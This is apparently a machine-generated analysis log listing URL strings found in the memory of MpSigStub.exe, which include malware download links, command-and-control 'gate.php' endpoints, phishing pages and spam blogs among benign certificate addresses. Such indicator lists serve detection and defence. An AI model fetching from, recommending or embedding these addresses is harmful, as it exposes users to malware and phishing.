Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://bar-refaeli-online.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://bardubar.com/mMS83JIdhq/ieygBSH38hsJa/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://barely-art.com/wp-content/themes/pennews/languages/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://barrefaeli-hot.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://batrasiaku.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://batysnewskz.kz/ups.com
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://bbc.lumpens.org/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bbfitblogger.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bbtbfr.pw/GetHPHost
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bbtbfr.pw/ads/gad1.js
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://bdsmforyoungs.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://beautybrief.com/c/gate.php
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://berita-mediasemasa.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://berita-tanahmelayu.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://berkah2013.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://best-search.us
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://best4hack.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://bestbsd.info/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bestnyaduit.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://bestofthebesttatoo.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://bestoneoffour.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://bestsoll.com/forum/go.php?sid=2
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://besttechforum.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://besttoolbars.net/af_analytics
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bestwebtips.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://beutiful-girl-fuck-moviepp.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://bfb3c.21a8b.j4fbs.k876c575n.v48796e.f5.nbdc.y7.v2da8e4kt.drovemeetings.in/
Source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	String found in binary or memory: http://bgtc.pctonics.com
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://bhngvfcdswqwertyuiopasdfghjkllkjhgfdsapo.ydns.eu/srvhost.doc
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://biancavoguel.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://bibliaamada.org/counter.php
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://big-boobs-nude.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://bigboobsp.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://bigdeal777.com/gate.php?f=
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bikerboyz11.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://bilakubercakap.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://bilincaltitelkincd.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://bilincaltitemizligi.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://billpay-center.com/post/506pblpks.exe
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://binnenspegel.fryslan.intern/ofdielingen/iv/ict/projecten/docbaseq32014/documenten/forms/templ
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://binni-ks.com/modules/dashgoals/binni.htm)
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://bintai.com.sg.oliverboeckel.com/zgf2ev9zdwlaymludgfplmnvbs5zzw==
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://binyousafindustries.com/fonts/jo/mops.exe
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://bis.180solutions.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bisersables.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2er
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2fy
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2h9
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2pe
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2tt
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq3ed
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqksy
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fql9f
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqlxg
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqm5f
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqmag
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqmin
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqnfa
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqnzq
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqrh4
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqv6g
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqv8b
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqwam
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqwdq
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqxt8
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqxx3
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqxx8
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyco
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqycs
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyh6
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyha
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyhe
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyhk
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzi9
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzim
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzmn
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzmv
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzr4
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzt3
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqztv
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly
Source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/28jsjnq)
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2bl50do
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2cobwhj)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2cokxeu)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2df4jbx)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2h3fi0m)
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2hload25ydu19
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2jg4gfn)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2kud4md)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2p8qtra)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2q93tca)
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://bitcoincoin.xyz/payment/xls.exe
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://bitmessage.org/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://bittupadam.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bjphplegal.org/wp-admin/script/)/s/uri
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://bl103w.blu103.mail.live.com/mail/InboxLight.aspx?n=
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: http://blackhole.ddnsgeek.com:8088
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://blackl1vesmatter.org/gate
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://blackl1vesmatter.org/success
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://blacksun.phpnet.us/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://blackterias.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://blank-record.com/cgi-bin/search?id=
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://blessedindia.org/9ifuurhgwq
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://blockchain.info/address/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog-ilmu10.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog-misteri.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://blog-rye.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://blog.eduadda.in/wp-content/themes/twentythirteen/get.php?id=
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: http://blog.x-row.net/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://blogcliphai.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bloggersiput.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://bloggiaitribg.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://bloghumortododiablog.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://blogketoanthue.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://bloglistcorner.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://blogluyoruz.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://blogphimhay41.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://blogsemasacaparnab.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://bloodcrypt.com/info/info.txt
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://bloodybits.com/edwinjefferson.com/ie_xo/
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://bnpost.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bollyinthon.com/docusign/doc/home/index.php)
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://bonkersmen.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://bonzo.lublin.pl/help/helpNEW.exe
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://book4u-free.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://booknology.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bootreading.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://bopdu.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://bornforthis.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bornonthescene.com/purchase/kill.php?ten=fingers)
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bosengaptek.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://boss.orda.icu/mailb.php
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	String found in binary or memory: http://bot.cjfeeds.com
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://bot.whatismyipaddress.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bousalemfoot.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://brazzerslove.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://brembotembo.com/1.dat
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://brembotembo.com/2.dat
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://brembotembo.com/doc.xls
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://brilhosefascinios.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://brokentools.xyz/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://brotherunited.cf/.start/yxblcmv6qgnhcm5pdmfslmnvbq==
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	String found in binary or memory: http://browsetosave.info
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://browseusers.myspace.com/Browse/Browse.aspx
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://bsalsa.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://bsskillthdyemmulatorsdevelovercomun6bfs.duckdns.org/document/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bugs.clamav.net
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://bukankeranaakutakcintafull.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://bulldogsportscol.com/docs/adobe/viewer.php?idp=login
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://busco-mujeres.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://businesswebapp.com/realtors/wp-admin/js/jb/login%20pdf.html)
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://butterchoco.net/admin/bull/gate.php
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://buy.haote.com/?
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://by137w.bay137.mail.live.com/mail/HipLight.aspx?n=
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://by137w.bay137.mail.live.com/mail/InboxLight.aspx?
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://by142w.bay142.mail.live.com/mail/InboxLight.aspx?n=
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://bytecoin.tk/m/svchosts.exe
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://c2quocoaidateh.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://c4.faceb00k.com:8888/files/run2.ps1
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/ocsp0
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://caferestaurantnador.com/wp-includes/0onjp/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://calastargate.net/y82rtzbz.php?id=1484429
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://calendar.cjishu.com/index.php
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://californianlondon.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp	String found in binary or memory: http://calleveinte.com.mx/ups-quantum-view
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://calux123.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://camaraquiterianopolis.ce.gov.br/rechnung/
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://canadahalalec.com/b685cf9fdc885f90abbb39b13022d1c4.php?q=
Source: MpSigStub.exe, 00000026.00000003.18295167449.00000138BE1EC000.00000004.00000001.sdmp	String found in binary or memory: http://canonicalizer.ucsuri.tcs/(%w%w
Source: MpSigStub.exe, 00000026.00000003.18315823751.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://canonicalizer.ucsuri.tcs/3
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://capsnit.com
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: http://captinads.com/oldtest/page.php
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://care-indonesia.org/open-invoices/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://cargohl.com/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://carrentalhelp.org/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://carsgirlssexy.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://casaalberti.com/wp-content/files_mf/2/resume.php?id=
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://cashbackmoa.co.kr/reward.php?name=%s&userid=%s&macaddr=%s&orgaddr=%s
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://casinotropez.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://catatanerwin.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://catatanfarhans.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://catell.ru/set.js
